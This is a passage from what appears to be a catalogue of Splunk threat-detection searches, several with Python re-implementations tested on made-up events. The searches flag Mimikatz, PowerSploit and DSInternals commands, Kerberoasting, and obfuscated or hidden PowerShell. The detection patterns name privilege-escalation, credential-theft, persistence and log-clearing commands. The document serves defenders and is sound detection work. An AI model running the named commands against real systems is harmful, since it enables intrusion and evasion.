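SAMPLE_EVENTS = [
    ("2020-07-21T08:00:00", "srv-01", "The Windows Update service entered the running state."),
    ("2020-07-21T08:01:00", "srv-01", "The Print Spooler service entered the stopped state."),
    ("2020-07-21T08:02:00", "srv-02",
     "The Background Intelligent Transfer Service (BITS) service entered the running state."),
    ("2020-07-21T08:03:00", "srv-02", "The ContosoRemoteHelper service entered the running state."),
    ("2020-07-21T08:04:00", "srv-03", "Some unrelated system message."),
]


if __name__ == "__main__":
    baseline = build_sample_baseline()
    for hit in detect_new_running_services(SAMPLE_EVENTS, baseline, NOW):
        print(hit)
```

The window matters in two directions: a service first seen five days ago is still reported because its `firstTimeSeen` is inside the window, and a service the "Update" search aged out because it had not run for longer than the window is reported again when it reappears. Both are intended; the false-positive note above applies to each.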

Required field

ATT&CK

ID Technique Tactic
T1569.002 Service Execution Execution


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

A previously unseen service is not necessarily malicious. Verify that the service is legitimate and that it was installed by a legitimate process.

Reference

Test Dataset

version: 4


First time seen command line argument

This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen. This is an implementation in SPL2 of the rule `First time seen command line argument` by @bpatel.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059, T1202
  • Last Updated: 2021-02-01

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), cmd_line=ucast(map_get(input_event, "process"), "string", null), cmd_line_norm=lower(cmd_line), cmd_line_norm=replace(cmd_line_norm, /[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}/, "GUID"), cmd_line_norm=replace(cmd_line_norm, /(?<=\s)+\\[^:]*(?=\\.*\.\w{3}(\s |$)+)/, "\\PATH"), /* replaces " \\Something\\Something\\command.ext" => "PATH\\command.ext" */ cmd_line_norm=replace(cmd_line_norm, /\w:\\[^:]*(?=\\.*\.\w{3}(\s |$)+)/, "\\PATH"), /* replaces "C:\\Something\\Something\\command.ext" => "PATH\\command.ext" */ cmd_line_norm=replace(cmd_line_norm, /\d+/, "N") | where process_name="cmd.exe" AND match_regex(ucast(cmd_line, "string", ""), /.* \/[cC] .*/)=true | select cmd_line, cmd_line_norm, timestamp, dest_device_id, dest_user_id | first_time_event input_columns=["cmd_line_norm"] | where first_time_cmd_line_norm | eval start_time = timestamp, end_time = timestamp, entities = mvappend(dest_device_id, dest_user_id), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be populating the endpoint data model for SSA, and specifically the process_name and process fields.
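What makes this rule usable is the normalisation chain applied before `first_time_event`: the command line is lower-cased, GUIDs become `GUID`, the directory part of any path to a `.ext` file becomes `\PATH`, and runs of digits become `N`, so two launches that differ only in a temp-file name or an identifier collapse to one "seen" key. The Python below is an added example, not Splunk's code: it reproduces that chain, the `process_name="cmd.exe"` plus `" /c "` filter, and the first-time check on constructed events. Python's `re` does not accept the quantified lookbehind the search uses, so the two path regexes are a simplified equivalent (assumption), and the `seen` set stands in for the state `first_time_event` keeps between runs.

```python
"""Command-line normalisation and first-time check for cmd.exe /c (added example)."""
import re

# GUID pattern from the search (input is already lower-cased when it runs)
GUID_RE = re.compile(
    r"[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}")
# " \something\something\command.ext" -> " \PATH\command.ext" (simplified)
UNC_PATH_RE = re.compile(r"(?<=\s)\\[^:\s]*(?=\\[^\\\s]+\.\w{3}(\s|$))")
# "c:\something\something\command.ext" -> "\PATH\command.ext" (simplified)
DRIVE_PATH_RE = re.compile(r"\w:\\[^:\s]*(?=\\[^\\\s]+\.\w{3}(\s|$))")
DIGITS_RE = re.compile(r"\d+")
SLASH_C_RE = re.compile(r" /[cC] ")          # match_regex(cmd_line, /.* \/[cC] .*/)


def normalize_cmd_line(cmd_line):
    """Apply the search's eval chain in the same order."""
    norm = cmd_line.lower()
    norm = GUID_RE.sub("GUID", norm)
    norm = UNC_PATH_RE.sub(r"\\PATH", norm)     # repl "\\PATH" -> literal \PATH
    norm = DRIVE_PATH_RE.sub(r"\\PATH", norm)
    norm = DIGITS_RE.sub("N", norm)
    return norm


def detect_first_time_cmd_lines(events, seen=None):
    """One detection per normalised cmd.exe /c command line the first time it
    appears. `seen` is an in-memory stand-in for first_time_event's state."""
    seen = set() if seen is None else seen
    hits = []
    for ev in events:
        cmd_line = ev.get("process")
        if ev.get("process_name") != "cmd.exe" or not cmd_line:
            continue
        if not SLASH_C_RE.search(cmd_line):
            continue
        norm = normalize_cmd_line(cmd_line)
        if norm in seen:
            continue
        seen.add(norm)
        hits.append({
            "cmd_line": cmd_line,
            "cmd_line_norm": norm,
            "timestamp": ev["_time"],
            "entities": [ev["dest_device_id"], ev["dest_user_id"]],
        })
    return hits


# Constructed SSA-style events (device ids, users and times are made up)
SAMPLE_EVENTS = [
    {"_time": 1612137600, "dest_device_id": "wks-01", "dest_user_id": "alice",
     "process_name": "cmd.exe", "process": r"C:\Windows\System32\cmd.exe /c whoami"},
    {"_time": 1612137660, "dest_device_id": "wks-02", "dest_user_id": "bob",
     "process_name": "cmd.exe", "process": r"C:\Windows\System32\cmd.exe /c whoami"},
    {"_time": 1612137720, "dest_device_id": "wks-02", "dest_user_id": "bob",
     "process_name": "cmd.exe",
     "process": r"C:\Windows\System32\cmd.exe /c del C:\Users\bob\AppData\Local\Temp\tmp1234.tmp"},
    {"_time": 1612137780, "dest_device_id": "wks-03", "dest_user_id": "carol",
     "process_name": "cmd.exe",
     "process": r"C:\Windows\System32\cmd.exe /c del C:\Users\carol\AppData\Local\Temp\tmp5678.tmp"},
    {"_time": 1612137840, "dest_device_id": "wks-03", "dest_user_id": "carol",
     "process_name": "cmd.exe",
     "process": r"C:\Windows\System32\cmd.exe /c echo 123e4567-e89b-12d3-a456-426614174000"},
    {"_time": 1612137900, "dest_device_id": "wks-04", "dest_user_id": "dave",
     "process_name": "cmd.exe", "process": r"C:\Windows\System32\cmd.exe /k whoami"},
    {"_time": 1612137960, "dest_device_id": "wks-04", "dest_user_id": "dave",
     "process_name": "powershell.exe", "process": r"powershell.exe /c whoami"},
]


if __name__ == "__main__":
    for hit in detect_first_time_cmd_lines(SAMPLE_EVENTS):
        print(hit["cmd_line_norm"], "<-", hit["cmd_line"])
```

Of the seven constructed events, only three are reported: the second `whoami` and the second temp-file deletion collapse onto keys already seen, the `/k` launch fails the `/c` filter, and the PowerShell launch fails the process-name filter. The normalisation is deliberately lossy; when tuning, check that it does not also collapse a benign pattern onto a malicious one.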

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution
T1202 Indirect Command Execution Defense Evasion


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command/program is being executed. We recommend customizing the `first_time_seen_cmd_line_filter` macro to exclude legitimate parent_process_name values.

Reference

Test Dataset

version: 2


Hiding files and directories with attrib exe

Attackers leverage an existing Windows binary, attrib.exe, to mark specific files as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1222.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe (Processes.process=*+h*) by Processes.parent_process Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `hiding_files_and_directories_with_attrib_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1222.001 Windows File and Directory Permissions Modification Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some applications and users may legitimately use attrib.exe to interact with the files.

Reference

Test Dataset


version: 4


Illegal access to user content via powersploit modules

This detection identifies access to PowerSploit modules that enable illegal access to user content, such as key logging, audio recording, screenshots, tapping into HTTP and RDP sessions, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021, T1113, T1123, T1563
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-HttpStatus/)=true OR match_regex(cmd_line, /(?i)Get-Keystrokes/)=true OR match_regex(cmd_line, /(?i)Get-MicrophoneAudio/)=true OR match_regex(cmd_line, /(?i)Get-NetRDPSession/)=true OR match_regex(cmd_line, /(?i)Get-TimedScreenshot/)=true OR match_regex(cmd_line, /(?i)Get-WebConfig/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1021 Remote Services Lateral Movement
T1113 Screen Capture Collection
T1123 Audio Capture Collection
T1563 Remote Service Session Hijacking Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal account creation via powersploit modules

This detection identifies access to PowerSploit modules that create accounts illegally.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1585
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)New-DomainUser/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1585 Establish Accounts Resource Development


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal deletion of logs via mimikatz modules

This detection identifies access to PowerSploit modules that delete event logs.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1070
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)event::drop/)=true OR match_regex(cmd_line, /(?i)event::clear/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1070 Indicator Removal on Host Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal enabling or disabling of accounts via dsinternals modules

This detection identifies use of DSInternals modules that enable or disable accounts illegally.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1078, T1098
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Disable-ADDBAccount/)=true OR match_regex(cmd_line, /(?i)Enable-ADDBAccount/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal management of active directory elements and policies via dsinternals modules

This detection identifies use of DSInternals modules for illegal management of Active Directory elements and policies.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1098, T1207, T1484
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Remove-ADDBObject/)=true OR match_regex(cmd_line, /(?i)Set-ADDBDomainController/)=true OR match_regex(cmd_line, /(?i)Set-ADDBPrimaryGroup/)=true OR match_regex(cmd_line, /(?i)Set-LsaPolicyInformation/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1098 Account Manipulation Persistence
T1207 Rogue Domain Controller Defense Evasion
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal management of computers and active directory elements via powersploit modules

This detection identifies access to PowerSploit modules that enable illegal management of computers and Active Directory elements.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1098, T1207, T1484
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Set-DomainObject/)=true OR match_regex(cmd_line, /(?i)Set-ADObject/)=true OR match_regex(cmd_line, /(?i)Set-DomainObjectOwner/)=true OR match_regex(cmd_line, /(?i)Set-MasterBootRecord/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1098 Account Manipulation Persistence
T1207 Rogue Domain Controller Defense Evasion
T1484 Domain Policy Modification Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal privilege elevation and persistence via powersploit modules

This detection identifies access to PowerSploit modules that illegally elevate general privileges or ensure persistence, e.g., by enabling manipulation of the registry, task scheduling, persistent WMI, or access to OS objects under desired identities.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1053, T1134, T1548
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Add-DomainObjectAcl/)=true OR match_regex(cmd_line, /(?i)Add-ObjectAcl/)=true OR match_regex(cmd_line, /(?i)Enable-Privilege/)=true OR match_regex(cmd_line, /(?i)New-ElevatedPersistenceOption/)=true OR match_regex(cmd_line, /(?i)New-UserPersistenceOption/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal privilege elevation via mimikatz modules

This detection identifies use of Mimikatz modules for illegal privilege elevation.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1134, T1548
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)privilege::debug/)=true OR match_regex(cmd_line, /(?i)token::elevate/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1134 Access Token Manipulation Defense Evasion, Privilege Escalation
T1548 Abuse Elevation Control Mechanism Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal service and process control via mimikatz modules

This detection identifies use of Mimikatz modules for illegal control over services and processes, including the authentication service.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1055, T1106, T1569
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)process::start/)=true OR match_regex(cmd_line, /(?i)service::\+/)=true OR match_regex(cmd_line, /(?i)service::\-/)=true OR match_regex(cmd_line, /(?i)service::start/)=true OR match_regex(cmd_line, /(?i)service::stop/)=true OR match_regex(cmd_line, /(?i)service::suspend/)=true OR match_regex(cmd_line, /(?i)misc::memssp/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from the devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1106 Native API Execution
T1569 System Services Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Illegal service and process control via powersploit modules

This detection identifies access to PowerSploit modules that enable illegal control of services and processes, such as installing or spoofing of malicious services, injecting malicious code in DLLs and EXEs, invoking shell code and WMI commands, modifying access to service objects, etc.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1055, T1106, T1569
  • Last Updated: 2020-11-09

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Install-SSP/)=true OR match_regex(cmd_line, /(?i)Set-CriticalProcess/)=true OR match_regex(cmd_line, /(?i)Install-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Restore-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Write-ServiceBinary/)=true OR match_regex(cmd_line, /(?i)Set-ServiceBinaryPath/)=true OR match_regex(cmd_line, /(?i)Invoke-ReflectivePEInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-DllInjection/)=true OR match_regex(cmd_line, /(?i)Invoke-ServiceAbuse/)=true OR match_regex(cmd_line, /(?i)Invoke-Shellcode/)=true OR match_regex(cmd_line, /(?i)Invoke-WScriptUACBypass/)=true OR match_regex(cmd_line, /(?i)Invoke-WmiCommand/)=true OR match_regex(cmd_line, /(?i)Write-HijackDll/)=true OR match_regex(cmd_line, /(?i)Add-ServiceDacl/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from the devices of interest, including event ID 4688 with command-line logging enabled.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1055 Process Injection Defense Evasion, Privilege Escalation
T1106 Native API Execution
T1569 System Services Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Kerberoasting spn request with rc4 encryption

This search detects a potential Kerberoasting attack via service principal name (SPN) requests.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1558.003
  • Last Updated: 2020-10-16

Search

`wineventlog_security` EventCode=4769 Ticket_Options=0x40810000 Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberoasting_spn_request_with_rc4_encryption_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, and include the Windows Security event logs that contain Kerberos ticket requests (EventCode 4769).

Required field

ATT&CK

ID Technique Tactic
T1558.003 Kerberoasting Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Older systems that support Kerberos RC4 by default, such as NetApp, may generate false positives.

Reference


Test Dataset


version: 3


Macos - re-opened applications

This search looks for processes referencing the plist files that determine which applications are re-opened when a user reboots their machine.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2020-02-07

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `macos___re_opened_applications_filter`

Associated Analytic Story

How To Implement

In order to properly run this search, Splunk needs to ingest process data from your osquery deployed agents with the [splunk.conf](https://github.com/splunk/TA-osquery/blob/master/config/splunk.conf) pack enabled. Also the [TA-OSquery](https://github.com/splunk/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the data populate the Endpoint data model.

Required field

Kill Chain Phase

  • Installation
  • Command and Control


Known False Positives

At this stage, there are no known false positives. During testing, no process events referring to the com.apple.loginwindow.plist files were observed during normal operation of re-opening applications on reboot. Therefore, it can be assumed that any occurrences of this in the process events would be worth investigating. In the event that the legitimate modification of these files by the system is in fact logged to the process log, the process_name of that process can be added to an allow list.

Reference

Test Dataset

version: 1


Malicious powershell process - connect to internet with hidden window

This search looks for PowerShell processes started with parameters to modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Deprecated because a hidden window is not needed when downloading a file with System.Net.WebClient.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-11-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe Processes.process=*-WindowStyle* Processes.process=*hidden* Processes.process="*New-Object*" by Processes.user Processes.process_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___connect_to_internet_with_hidden_window_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate processes can have this combination of command-line options, but it is not common.

Reference

Test Dataset


version: 5


Malicious powershell process - encoded command

This search looks for PowerShell processes that have encoded the script within the command-line. Malware has been seen using this parameter, as it obfuscates the code and makes it relatively easy to pass a script on the command-line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1027
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = powershell.exe (Processes.process=*-EncodedCommand* OR Processes.process=*-enc*) by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___encoded_command_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1027 Obfuscated Files or Information Defense Evasion


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

System administrators may use this option, but it's not common.

Reference

Test Dataset


version: 4


Malicious powershell process - execution policy bypass

This search looks for PowerShell processes started with parameters used to bypass the local execution policy for scripts. These parameters are often observed in attacks leveraging PowerShell scripts as they override the default PowerShell execution policy.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` values(Processes.process_id) as process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe (Processes.process="* -ex*" OR Processes.process="* bypass *") by Processes.process_id, Processes.user, Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_process___execution_policy_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

There may be legitimate reasons to bypass the PowerShell execution policy. The PowerShell script being run with this parameter should be validated to ensure that it is legitimate.

Reference

Test Dataset


version: 4


Malicious powershell process with obfuscation techniques

This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2021-01-19

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval num_obfuscation = (mvcount(split(process,"`"))-1) + (mvcount(split(process, "^"))-1) + (mvcount(split(process, "'"))-1) | `malicious_powershell_process_with_obfuscation_techniques_filter` | search num_obfuscation > 10
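The `num_obfuscation` scoring of this search, re-implemented over constructed Endpoint.Processes rows so the threshold behaviour can be checked offline. This is an added example, not Splunk Security Content code; the sample rows and the `flag_obfuscated_powershell` helper are this example's own.

```python
"""Added example (not Splunk's code): the num_obfuscation scoring of the
"Malicious powershell process with obfuscation techniques" search, applied to
constructed Endpoint.Processes rows so the threshold behaviour can be checked."""

# The three characters the SPL eval splits on; mvcount(split(x, c)) - 1 is the
# number of occurrences of c in x, so a plain character count gives the same score.
OBFUSCATION_CHARS = ("`", "^", "'")
THRESHOLD = 10  # the search keeps rows where num_obfuscation > 10

# Constructed sample rows shaped like the Endpoint.Processes fields the search
# groups by (not real telemetry).
SAMPLE_EVENTS = [
    {"dest": "wks01", "user": "alice", "process_name": "powershell.exe",
     "process": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    # many quoted fragments concatenated: 24 single quotes in total
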